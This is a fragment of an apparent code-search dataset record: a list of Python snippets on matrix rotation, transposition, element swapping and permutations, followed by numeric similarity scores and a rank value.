range(d):\n if k == i or k == j:\n continue\n x = a*d*d + d*i + k\n y = a*d*d + d*j + k\n v[x], v[y] = v[y], v[x]\n\n x = a*d*d + d*k + i\n y = a*d*d + d*k + j\n v[x], v[y] = v[y], v[x]\n\n x = a*d*d + d*i + i\n y = a*d*d + d*j + j\n v[x], v[y] = v[y], v[x]\n\n x = a*d*d + d*j + i\n y = a*d*d + d*i + j\n v[x], v[y] = v[y], v[x]", "def rotate(self, matrix: List[List[int]]) -> None:\n # transpose\n N = len(matrix)\n for i in range(N):\n for j in range(0, i):\n matrix[i][j] = matrix[i][j] ^ matrix[j][i]\n matrix[j][i] = matrix[i][j] ^ matrix[j][i]\n matrix[i][j] = matrix[i][j] ^ matrix[j][i]\n \n # print(matrix)\n # 左右互换\n for i in range(N):\n for j in range(N // 2):\n matrix[i][j] = matrix[i][j] ^ matrix[i][N - j - 1]\n matrix[i][N - j - 1] = matrix[i][j] ^ matrix[i][N - j - 1]\n matrix[i][j] = matrix[i][j] ^ matrix[i][N - j - 1]\n # print(matrix)", "def rotate(self, matrix: List[List[int]]) -> None:\n length = len(matrix)\n for row in range(length//2):\n for col in range(row, 
length-row-1):\n # matrix[row][col], matrix[col][length-1-row], matrix[length-1-row][length-1-col], matrix[length-1-col][row]\n matrix[col][length-1-row], matrix[length-1-row][length-1-col], matrix[length-1-col][row], matrix[row][col] = matrix[row][col], matrix[col][length-1-row], matrix[length-1-row][length-1-col], matrix[length-1-col][row]\n return", "def z_operator_matrix(self):\n n, r_1, r_2, k = self.n, self.r_1, self.r_2, self.k\n\n # Use the row vector [ A2^T 0 I ], which commutes with the check matrix.\n check_mat = np.zeros((k, n), dtype='int')\n check_mat[:, 0:r_1] = np.transpose(self.parity_check_c1[:, (r_1 + r_2):n])\n check_mat[:, (r_1 + r_2):n] = np.identity(k)\n return check_mat", "def rotate(self, matrix: list) -> None:\n for i in range(len(matrix)):\n for j in range(i):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n # matrix[i].reverse()\n print(matrix)\n for i in range(len(matrix)):\n matrix[i].reverse()\n print(matrix)", "def __mul__(self, other):\n #\n # TODO - your code here\n #\n final_matrix = []\n for i in range(self.h):\n temp_row = []\n for j in range(other.w):\n # take dot-product of row of\n # matrix in 1st arg with col of\n # matrix in 2nd arg\n temp_row.append(dot_product(get_row(self.g, i), get_col(other.g, j)))\n final_matrix.append(temp_row)\n return Matrix(final_matrix)\n # TODO - your code here", "def rotate_2d_matrix(matrix):\n\n L = len(matrix)\n for i in range(L // 2):\n for j in range(i, L - i - 1):\n temp = matrix[i][j]\n matrix[i][j] = matrix[L - 1 - j][i]\n matrix[L - 1 - j][i] = matrix[L - 1 - i][L - 1 - j]\n matrix[L - 1 - i][L - 1 - j] = matrix[j][L - 1 - i]\n matrix[j][L - 1 - i] = temp", "def trans_o(self):\n temp_array = []\n for j in range(self.O.shape[1]):\n for i in range(self.V.shape[1]):\n if self.V[0, i] == self.O[0, j]:\n temp_array.append(i)\n self.O = mat(temp_array)", "def mirror(self, p1=(0, 1), p2=(0, 0)) -> \"Group\":\n for e in self.elements:\n e.mirror(p1=p1, p2=p2)\n return self", "def _permute_generetably(elements: List[T], i: int):\n if i == 1:\n yield elements\n else:\n for j in range(i - 1):\n for permutation in _permute_generetably(elements, i - 1):\n yield permutation\n\n k = 0 if i % 2 == 1 else j\n\n elements[k], elements[i - 1] = elements[i - 1], elements[k]\n\n for permutation in _permute_generetably(elements, i - 1):\n yield permutation", "def rotate(self, matrix: List[List[int]]) -> None:\n if(matrix == None or len(matrix) == 1): return\n n = len(matrix)\n for i in range(0, n//2 + 1):\n for j in range(i, n-1-i):\n tmp = matrix[i][j]\n matrix[i][j] = matrix[n-1-j][i]\n matrix[n-1-j][i] = matrix[n-1-i][n-1-j]\n matrix[n-1-i][n-1-j] = matrix[j][n-1-i]\n matrix[j][n-1-i] = tmp\n \n return", "def rotate(self, matrix: List[List[int]]) -> None:\n n = len(matrix)\n for i in range(n):\n for j in range(n // 2):\n matrix[i][j], matrix[i][n-1-j] = matrix[i][n-1-j], matrix[i][j]\n for i in range(n):\n for j in range(n-i):\n matrix[i][j], matrix[n-1-j][n-1-i] = matrix[n-1-j][n-1-i], matrix[i][j]", "def swap(self,i,j):\r\n self._data[i], self._data[j] = self._data[j], self._data[i]", "def mirror(self):\n for l in range(self.numRows):\n mirrorGrid = []\n for l in range(self.numCols):\n row = self.grid[l][::-1]\n mirrorGrid.append(row)\n return mirrorGrid", "def _swap(self, i, j):\n self._data[i], self._data[j] = self._data[j], self._data[i]", "def _swap(self, i, j):\n self._data[i], self._data[j] = self._data[j], self._data[i]", "def swapRows(self, i, j):\n if not (type(i) in MATRIX_VALID_INTS and type(\n j) in 
MATRIX_VALID_INTS): # this should be fixed to accomodate 'long' types\n raise TypeError(\"Row indices must be of type 'int'\")\n rowA = self.deleteRow(max(i, j))\n rowB = self.deleteRow(min(i, j))\n self.insertRow(min(i, j), *rowA)\n self.insertRow(max(i, j), *rowB)", "def reverse_cuthill_mckee(self, permutation: bool = True) -> [np.ndarray, np.ndarray]:\n # 1. get the connectivity matrix\n nodeids, C = self.node_connectivity_matrix()\n\n # 2. compute the new node order\n perm = scipy.sparse.csgraph.reverse_cuthill_mckee(C, False)\n\n # 3. create a dictionary with new node order\n nodeids = {nid: perm[i] for nid, i in nodeids.items()}\n\n if permutation:\n # 4. create the permutation matrix for node order if requested\n P = C[np._ix(perm, perm)]\n return nodeids, P\n else:\n # 4. or return just the new node order\n return nodeids", "def _swap2(self, cids, iids):\n # The coupling indexes of the two legs to swap\n c1, c2 = cids\n # The index of the two legs to swap within the given coupling\n i1, i2 = iids\n assert c1 != c2\n\n # Get the connecting coupling between the two couplings\n cnx = self.get_couplingnetwork().to_undirected(as_view=True)\n ci = set(nx.common_neighbors(cnx, *[self.coupling[ii] for ii in cids]))\n if len(ci) != 1:\n raise ValueError(f'cids: {cids} have {len(ci)} common neighbors')\n ci = self.coupling.index(ci.pop())\n\n # internal legs\n l1 = cnx.edges[self.coupling[c1], self.coupling[ci], 0]['leg']\n l2 = cnx.edges[self.coupling[c2], self.coupling[ci], 0]['leg']\n\n # index of the internal leg in c1 and c2\n legs = self.get_legs()\n il1, il2 = [[legs[x].index(ll) for x in (y, ci)]\n for y, ll in zip(cids, (l1, l2))]\n\n assert il1[0] != i1 and il2[0] != i2\n assert il1[1] != il2[1]\n # Check that the flow is consistent along the internal bond\n assert self.coupling[c1][il1[0]][1] is not self.coupling[ci][il1[1]][1]\n assert self.coupling[c2][il2[0]][1] is not self.coupling[ci][il2[1]][1]\n\n def permute_key(key):\n copy = list(list(k) for k in key)\n copy[c1][i1], copy[c2][i2] = copy[c2][i2], copy[c1][i1]\n return copy\n f1, f2, fi = ([x[1] for x in self.coupling[c]] for c in (c1, c2, ci))\n self._coupling = tuple(tuple(c) for c in permute_key(self.coupling))\n\n # All good interal symmetry sectors in for the swapped 1st coupling\n nkeys = set(tuple(tuple(e) for e in permute_key(k)) for k in self)\n c1set = {}\n r11, r12 = set(range(3)).difference([il1[0]])\n for k in set(key[c1] for key in nkeys):\n kn = (k[r11], k[r12])\n if kn not in c1set:\n c1set[kn] = set(\n sls.allowed_couplings(k, f1, il1[0], self.symmetries))\n c2set = {}\n r21, r22 = set(range(3)).difference([il2[0]])\n for k in set(key[c2] for key in nkeys):\n kn = (k[r21], k[r22])\n if kn not in c2set:\n c2set[kn] = set(\n sls.allowed_couplings(k, f2, il2[0], self.symmetries))\n\n vac = sls.vacuumIrrep(self.symmetries)\n Z1 = set().union(*c1set.values())\n Z2 = set().union(*c2set.values())\n rf = set(range(3)).difference([il1[1], il2[1]]).pop()\n fit = [fi[rf], fi[il1[1]], fi[il2[1]]]\n oks = {(k1, k2): set(sls.allowed_couplings((vac, k1, k2),\n fit, 0, self.symmetries))\n for k1, k2 in itertools.product(Z1, Z2)}\n\n def mappingf(okey):\n nk = permute_key(okey)\n set1 = c1set[(nk[c1][r11], nk[c1][r12])]\n set2 = c2set[(nk[c2][r21], nk[c2][r22])]\n for kk1 in set1:\n for kk2 in set2:\n if nk[ci][rf] not in oks[(kk1, kk2)]:\n continue\n\n # Assign the key of the internal leg\n nk[c1][il1[0]], nk[ci][il1[1]] = kk1, kk1\n nk[c2][il2[0]], nk[ci][il2[1]] = kk2, kk2\n yield tuple(tuple(e) for e in nk)\n\n 
prefdict = sls._prefswap2(iids, il1, il2, f1, f2, fi)\n\n def prefactorf(okey, nkey):\n flokey = [list(x) for x in\n zip(*[el for j in (c1, c2, ci) for el in okey[j]])]\n flnkey = [list(x) for x in\n zip(*[el for j in (c1, c2, ci) for el in nkey[j]])]\n return np.prod([prefdict.get(ss, lambda x, y: 1.)(o, n) for\n o, n, ss in zip(flokey, flnkey, self.symmetries)])\n\n self._manipulate_coupling(mappingf, prefactorf)\n return self", "def perm_2_let():\r\n return {''.join(i) for i in permutations('abcdefghijklmnopqrstuvwxyz', 2)}\r\n # print(comb_2_let, sep='')\r", "def transferMatrix(self, i1=0, i2=-1, plane=\"x\"):\n B2 = self.normMat(i2, plane=plane)\n B1 = self.normMat(i1, plane=plane)\n psi = 2 * np.pi * (self[\"mu\" + plane][i2] - self[\"mu\" + plane][i1])\n R = np.array([[np.cos(psi), np.sin(psi)], [-np.sin(psi), np.cos(psi)]])\n return np.dot(np.dot(B2, R), np.linang.inv(B1))", "def permutations(cube):\r\n yield from rotations24(cube)\r\n yield from rotations24(np.flip(cube, 0))\r\n yield from rotations24(np.flip(cube, 1))\r\n yield from rotations24(np.flip(cube, 2))", "def _swap(self, x1, y1, x2, y2):\n puzzle_copy = [list(row) for row in self.position] # copy the puzzle\n puzzle_copy[x1][y1], puzzle_copy[x2][y2] = puzzle_copy[x2][y2], puzzle_copy[x1][y1]\n\n return puzzle_copy", "def swap_full(permutation, transposition,nb_position):\n i, j = transposition\n res = np.array(permutation)\n res[i], res[j] = res[j], res[i]\n return tuple(res[:nb_position])", "def symmetrize(n):\n times = lambda x: jnp.concatenate((jnp.flipud(x), x))\n trans = lambda x: x[n:] + x[n-1::-1]\n return Operator(times=times, trans=trans, shape=(2*n,n))", "def rotate_matrix(self, mat):\r\n N=3\r\n for x in range(0, int(N / 2)):\r\n for y in range(x, N-x-1):\r\n temp = mat[x][y]\r\n mat[x][y] = mat[y][N-1-x]\r\n mat[y][N-1-x] = mat[N-1-x][N-1-y]\r\n mat[N-1-x][N-1-y] = mat[N-1-y][x]\r\n mat[N-1-y][x] = temp\r\n return mat", "def test_matrix(self, tol):\n\n res_static = qml.QFT.compute_matrix(2)\n res_dynamic = qml.QFT(wires=[0, 1]).matrix()\n res_reordered = qml.QFT(wires=[0, 1]).matrix([1, 0])\n\n expected = np.array(\n [\n [0.5 + 0.0j, 0.5 + 0.0j, 0.5 + 0.0j, 0.5 + 0.0j],\n [0.5 + 0.0j, 0.0 + 0.5j, -0.5 + 0.0j, -0.0 - 0.5j],\n [0.5 + 0.0j, -0.5 + 0.0j, 0.5 - 0.0j, -0.5 + 0.0j],\n [0.5 + 0.0j, -0.0 - 0.5j, -0.5 + 0.0j, 0.0 + 0.5j],\n ]\n )\n\n assert np.allclose(res_static, expected, atol=tol, rtol=0)\n assert np.allclose(res_dynamic, expected, atol=tol, rtol=0)\n\n expected_permuted = [\n [0.5 + 0.0j, 0.5 + 0.0j, 0.5 + 0.0j, 0.5 + 0.0j],\n [0.5 + 0.0j, 0.5 - 0.0j, -0.5 + 0.0j, -0.5 + 0.0j],\n [0.5 + 0.0j, -0.5 + 0.0j, 0.0 + 0.5j, -0.0 - 0.5j],\n [0.5 + 0.0j, -0.5 + 0.0j, -0.0 - 0.5j, 0.0 + 0.5j],\n ]\n assert np.allclose(res_reordered, expected_permuted, atol=tol, rtol=0)", "def rotate(self, matrix: list[list[int]]) -> None:", "def transpose(self):\n for i in range(self.columns): # This for loop makes the rows we need in our transposed matrix\n matrix = [] # List that will contain the rows of the transpose matrix\n for j in range(self.rows): # This for loop makes the columns we need in our transposed matrix\n matrix.append(self.Matrix[j][i]) \n self.Transpose.append(matrix) # Appending the rows into the bigger list we created\n print(\"This is your transposed matrix: \", self.Transpose)", "def rotate(self, matrix: List[List[int]]) -> None:\n height=len(matrix)\n for h in range(math.ceil(height/2)):\n for i in range(h,height-h-1):\n # print((h,i), (height-i-1,h))\n temp=matrix[h][i]\n matrix[h][i] = 
matrix[height-i-1][h]\n matrix[height-i-1][h] = matrix[height-h-1][height-i-1]\n matrix[height-h-1][height-i-1] = matrix[i][height-h-1]\n matrix[i][height-h-1] = temp", "def part_2():\n return itertools.permutations(range(5, 10))", "def test_two_qubit_weyl_decomposition_swap(self):\n for k1l, k1r, k2l, k2r in K1K2S:\n k1 = np.kron(k1l.data, k1r.data)\n k2 = np.kron(k2l.data, k2r.data)\n a = Ud(np.pi / 4, np.pi / 4, np.pi / 4)\n self.check_two_qubit_weyl_decomposition(k1 @ a @ k2)", "def swap(self, adjacent_transposition):\n\n result = Tensor()\n for key_self in self.keys():\n # ensure that the swap can be made with the available slots\n if max(adjacent_transposition) < len(key_self):\n prefix = Tensor({Tensor._merge_keys(*key_self[0 : min(adjacent_transposition)]): self[key_self]})\n root = type(self)._clifford_swap(\n *key_self[min(adjacent_transposition) : max(adjacent_transposition) + 1]\n )\n postfix = Tensor({Tensor._merge_keys(*key_self[max(adjacent_transposition) + 1 :]): 1})\n result = result + prefix * root * postfix\n else:\n result = result + Tensor({key_self: self[key_self]})\n self.clear()\n self.update(result)\n return self", "def swap(self, i: int, j: int) -> None:\n self.data[i], self.data[j] = self.data[j], self.data[i]", "def MatMulOrder(D):\r\n\tnum = len(D)-1 # number of matrix in the chain\r\n\tprint(f\"There are {num} matrix to multiply\")\r\n\tM = [[0 for _ in range(num)] for _ in range(num)]\r\n\tP = [[0 for _ in range(num)] for _ in range(num)]\r\n\r\n\t# i要从大到小\r\n\t# i == j时, M[i][j]=0,所以不用更新\r\n\t# i-th矩阵到j-th矩阵的乘的最优值初始化为inf\r\n\tfor i in range(num-2, -1, -1):\r\n\t\tfor j in range(i+1, num):\r\n\t\t\tM[i][j] = 100000000\r\n\t\t\tfor k in range(i, j):\r\n\t\t\t\tnew = M[i][k] + M[k+1][j] + D[i]*D[k+1]*D[j+1]\r\n\t\t\t\tif new < M[i][j]:\r\n\t\t\t\t\tM[i][j] = new \r\n\t\t\t\t\tP[i][j] = k\r\n\treturn M, P", "def contract(tensor):\n temp = np.einsum('ikma, jlan', tensor, tensor)\n M = np.zeros((tensor.shape[0]**2, tensor.shape[1]**2, tensor.shape[2], tensor.shape[3]))\n for i,j,k,l,m,n in it.product(*[range(x) for x in temp.shape]):\n M[i + tensor.shape[0]*j, k + tensor.shape[1]*l, m, n] = temp[i,j,k,l,m,n]\n return M", "def test_flip_vectors(self):\r\n m_matrix = array([[1.0, 0.0, 1.0], [2.0, 4.0, 4.0]])\r\n jn_matrix = array([[1.2, 0.1, -1.2], [2.5, 4.0, -4.5]])\r\n new_matrix = _flip_vectors(jn_matrix, m_matrix)\r\n assert_almost_equal(new_matrix, array([[1.2, 0.1, 1.2], [2.5, 4.0, 4.5]]))", "def test_flip_vectors(self):\n m_matrix = array([[1.0, 0.0, 1.0], [2.0, 4.0, 4.0]])\n jn_matrix = array([[1.2, 0.1, -1.2], [2.5, 4.0, -4.5]])\n new_matrix = _flip_vectors(jn_matrix, m_matrix)\n assert_almost_equal(new_matrix, array([[1.2, 0.1, 1.2], [2.5, 4.0, 4.5]]))", "def swapCouplingTuples(self, permutation):\n from collections import Counter\n\n if Counter(permutation) != Counter(range(len(self.coupling))):\n raise ValueError(f'Permutation {permutation} is not valid')\n\n def permute_key(key):\n return tuple(key[p] for p in permutation)\n\n self._coupling = permute_key(self.coupling)\n\n def mappingf(okey):\n yield permute_key(okey)\n\n self._manipulate_coupling(mappingf, lambda x, y: 1)\n return self", "def check_perm(tri1,tri2):\n for t1 in tri1:\n for t2 in tri2:\n if t1 == t2:\n return False\n return True", "def matrix_chain_dynamic(dimensions, n):\n\n m = [[-1 for _ in range(n)] for _ in range(n)]\n s = [[0 for _ in range(n)] for _ in range(n)]\n\n # multiplying matrix by itself\n for i in range(1, n):\n m[i][i] = 0\n\n for length in range(2, n):\n for i in 
range(1, n - length + 1):\n j = i + length - 1\n for k in range(i, j):\n cost = m[i][k] + m[k + 1][j] + dimensions[i - 1] * dimensions[k] * dimensions[j]\n if cost > m[i][j]:\n m[i][j] = cost\n # index if splitting\n s[i][j] = k\n return m, s", "def products(q_1: Qs, q_2: Qs, kind: str = \"\", reverse: bool = False) -> Qs:\n\n q_1_copy = deepcopy(q_1)\n q_2_copy = deepcopy(q_2)\n qs_left, qs_right = Qs(), Qs()\n\n # Diagonalize if need be.\n if ((q_1.rows == q_2.rows) and (q_1.columns == q_2.columns)) or (\n \"scalar_q\" in [q_1.qs_type, q_2.qs_type]\n ):\n\n if q_1.columns == 1:\n qs_right = q_2_copy\n qs_left = diagonal(q_1_copy, qs_right.rows)\n\n elif q_2.rows == 1:\n qs_left = q_1_copy\n qs_right = diagonal(q_2_copy, qs_left.columns)\n\n else:\n qs_left = q_1_copy\n qs_right = q_2_copy\n\n # Typical matrix multiplication criteria.\n elif q_1.columns == q_2.rows:\n qs_left = q_1_copy\n qs_right = q_2_copy\n\n else:\n print(\n \"Oops, cannot multiply series with row/column dimensions of {}/{} to {}/{}\".format(\n q_1.rows, q_1.columns, q_2.rows, q_2.columns\n )\n )\n\n # Operator products need to be transposed.\n operator_flag = False\n if qs_left in [\"op\", \"operator\"] and qs_right in [\"op\", \"operator\"]:\n operator_flag = True\n\n outer_row_max = qs_left.rows\n outer_column_max = qs_right.columns\n shared_inner_max = qs_left.columns\n projector_flag = (\n (shared_inner_max == 1) and (outer_row_max > 1) and (outer_column_max > 1)\n )\n\n result = [\n [q0(q_type=\"\") for _i in range(outer_column_max)]\n for _j in range(outer_row_max)\n ]\n\n for outer_row in range(outer_row_max):\n for outer_column in range(outer_column_max):\n for shared_inner in range(shared_inner_max):\n\n # For projection operators.\n left_index = outer_row\n right_index = outer_column\n\n if outer_row_max >= 1 and shared_inner_max > 1:\n left_index = outer_row + shared_inner * outer_row_max\n\n if outer_column_max >= 1 and shared_inner_max > 1:\n right_index = shared_inner + outer_column * shared_inner_max\n\n result[outer_row][outer_column] = add(result[outer_row][outer_column],\n product(qs_left.qs[left_index],\n qs_right.qs[right_index], kind=kind, reverse=reverse\n )\n )\n\n # Flatten the list.\n new_qs = [item for sublist in result for item in sublist]\n new_states = Qs(new_qs, rows=outer_row_max, columns=outer_column_max)\n\n if projector_flag or operator_flag:\n return transpose(new_states)\n\n else:\n return new_states", "def symmetry_duplication(\n bijection: BijectionType,\n ) -> Iterator[BijectionType]:\n return (\n bij\n for rotated in (\n {k.rotate(angle): v.rotate(angle) for k, v in bijection.items()}\n for angle in range(4)\n )\n for bij in (rotated, {k.inverse(): v.inverse() for k, v in rotated.items()})\n )", "def transposed(self) -> 'MatrixBoolean':\n\t\tmatrix = MatrixBoolean(empty=(self.dimN, self.dimM))\n\t\tfor m in range(self.dimM):\n\t\t\tfor n in range(self.dimN):\n\t\t\t\tmatrix.matrix[n][m] = self.matrix[m][n]\n\t\treturn matrix", "def _swap_energies(i, j, energies):\n energies[:, [i, j]] = energies[:, [j, i]]", "def test_two_qubit_weyl_decomposition_iswap(self):\n for k1l, k1r, k2l, k2r in K1K2S:\n k1 = np.kron(k1l.data, k1r.data)\n k2 = np.kron(k2l.data, k2r.data)\n a = Ud(np.pi / 4, np.pi / 4, 0)\n self.check_two_qubit_weyl_decomposition(k1 @ a @ k2)", "def pd(self, other):\n return Matriz([self]).T() * Matriz([other])", "def sort(self):\n for i in range(self.num):\n for j in range(i,0,-1):\n if self.genepool[0][j] < self.genepool[0][j-1]:\n self.genepool[0][j], 
self.genepool[0][j-1] = self.genepool[0][j-1], self.genepool[0][j]\n else:\n break\n for i in range(self.num):\n for j in range(i,0,-1):\n if self.genepool[1][j] < self.genepool[1][j-1]:\n self.genepool[1][j], self.genepool[1][j-1] = self.genepool[1][j-1], self.genepool[1][j]\n else:\n break" ]
[ "0.6260572", "0.61407316", "0.60737467", "0.58037573", "0.5779625", "0.5728096", "0.56909776", "0.5626455", "0.5626066", "0.55842173", "0.5571164", "0.5571073", "0.5566883", "0.55655205", "0.55617666", "0.5537897", "0.55265135", "0.5522779", "0.55212414", "0.5504172", "0.5502277", "0.5499689", "0.5494559", "0.54692745", "0.5448146", "0.54468817", "0.54391587", "0.5429634", "0.5419231", "0.54069114", "0.53999865", "0.5399903", "0.5388735", "0.5387693", "0.5350425", "0.53328", "0.5332238", "0.533077", "0.5323849", "0.5318166", "0.53097653", "0.5303948", "0.529397", "0.5292545", "0.52909434", "0.52904165", "0.5283748", "0.5261649", "0.5255824", "0.52543145", "0.5245406", "0.52424765", "0.52421993", "0.52369875", "0.5233853", "0.5228763", "0.5226109", "0.52213526", "0.5217493", "0.5204849", "0.520208", "0.5195528", "0.5190807", "0.5190738", "0.51806414", "0.5172804", "0.51701295", "0.51699954", "0.51699954", "0.51694405", "0.51596904", "0.51573694", "0.5154442", "0.51522404", "0.5142365", "0.5139053", "0.5130099", "0.5129072", "0.5119029", "0.5113565", "0.51092374", "0.51089793", "0.5106363", "0.51026005", "0.5097424", "0.5090588", "0.50893134", "0.50871736", "0.5085991", "0.50849617", "0.5084761", "0.5073242", "0.5065707", "0.50647956", "0.50643754", "0.50617826", "0.50549674", "0.5050744", "0.50503874", "0.5049664", "0.5049319" ]
0.0
-1